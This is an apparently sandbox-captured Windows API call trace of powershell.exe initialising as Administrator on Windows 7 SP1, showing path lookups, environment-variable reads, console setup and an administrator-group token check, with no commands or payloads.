	[0545.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.447] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0545.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.447] CoTaskMemFree (pv=0x2a8780) 
	[0545.450] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0545.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.451] CoTaskMemFree (pv=0x2a8780) 
	[0545.451] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0545.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.451] CoTaskMemFree (pv=0x2a8780) 
	[0545.454] CoCreateGuid (in: pguid=0xcda88 | out: pguid=0xcda88*(Data1=0x7b338928, Data2=0x9fba, Data3=0x47ca, Data4=([0]=0x89, [1]=0x82, [2]=0xa8, [3]=0xad, [4]=0xe4, [5]=0xe3, [6]=0xe7, [7]=0x6f))) returned 0x0
	[0545.458] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0545.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.458] CoTaskMemFree (pv=0x2a8780) 
	[0545.461] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0545.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.461] CoTaskMemFree (pv=0x2a8780) 
	[0545.463] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0545.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.464] CoTaskMemFree (pv=0x2a8780) 
	[0545.471] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0545.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd730 | out: lpConsoleScreenBufferInfo=0xcd730) returned 1
	[0545.480] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0546.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd730 | out: lpConsoleScreenBufferInfo=0xcd730) returned 1
	[0546.457] GetVersionExW (in: lpVersionInformation=0xcd6c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd6c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0546.459] GetCurrentProcess () returned 0xffffffffffffffff
	[0546.460] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd758 | out: TokenHandle=0xcd758*=0x2e0) returned 1
	[0546.464] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd678 | out: TokenInformation=0x0, ReturnLength=0xcd678) returned 0
	[0546.465] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2072e0
	[0546.465] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x2072e0, TokenInformationLength=0x4, ReturnLength=0xcd678 | out: TokenInformation=0x2072e0, ReturnLength=0xcd678) returned 1
	[0546.467] DuplicateTokenEx (in: hExistingToken=0x2e0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd7d8 | out: phNewToken=0xcd7d8*=0x31c) returned 1
	[0546.467] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd678 | out: TokenInformation=0x0, ReturnLength=0xcd678) returned 0
	[0546.467] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x207290
	[0546.467] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x207290, TokenInformationLength=0x4, ReturnLength=0xcd678 | out: TokenInformation=0x207290, ReturnLength=0xcd678) returned 1
	[0546.468] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2d26790*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd7e8 | out: IsMember=0xcd7e8) returned 1
	[0546.468] CloseHandle (hObject=0x31c) returned 1
	[0546.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0547.342] CoTaskMemAlloc (cb=0x804) returned 0x1b3d9f30
	[0547.342] GetConsoleTitleW (in: lpConsoleTitle=0x1b3d9f30, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0547.343] CoTaskMemFree (pv=0x1b3d9f30) 
	[0547.368] CoTaskMemAlloc (cb=0x804) returned 0x1b3da7e0
	[0547.368] GetConsoleTitleW (in: lpConsoleTitle=0x1b3da7e0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0548.360] CoTaskMemFree (pv=0x1b3da7e0) 
	[0548.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0548.362] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0551.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0551.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0551.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0551.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0553.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.747] SetConsoleCtrlHandler (HandlerRoutine=0x29168dc, Add=1) returned 1
	[0559.777] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0559.781] CoCreateGuid (in: pguid=0xcd8d0 | out: pguid=0xcd8d0*(Data1=0x79605eb3, Data2=0xa787, Data3=0x430c, Data4=([0]=0x97, [1]=0x68, [2]=0xd3, [3]=0x2, [4]=0x9c, [5]=0xef, [6]=0x4b, [7]=0xa7))) returned 0x0
	[0559.782] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0559.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0559.782] CoTaskMemFree (pv=0x2a8780) 
	[0561.340] WinSqmIsOptedIn () returned 0x0
	[0561.341] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.341] CoTaskMemFree (pv=0x2a8780) 
	[0561.347] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.347] CoTaskMemFree (pv=0x2a8780) 
	[0561.348] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.349] CoTaskMemFree (pv=0x2a8780) 
	[0561.350] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.350] CoTaskMemFree (pv=0x2a8780) 
	[0561.350] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.350] CoTaskMemFree (pv=0x2a8780) 
	[0561.352] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.352] CoTaskMemFree (pv=0x2a8780) 
	[0561.353] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.353] CoTaskMemFree (pv=0x2a8780) 
	[0561.353] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.353] CoTaskMemFree (pv=0x2a8780) 
	[0561.356] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.356] CoTaskMemFree (pv=0x2a8780) 
	[0561.366] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0561.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.366] CoTaskMemFree (pv=0x2a8780) 
	[0562.867] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0562.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.868] CoTaskMemFree (pv=0x2a8780) 
	[0562.868] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0562.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.869] CoTaskMemFree (pv=0x2a8780) 
	[0568.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
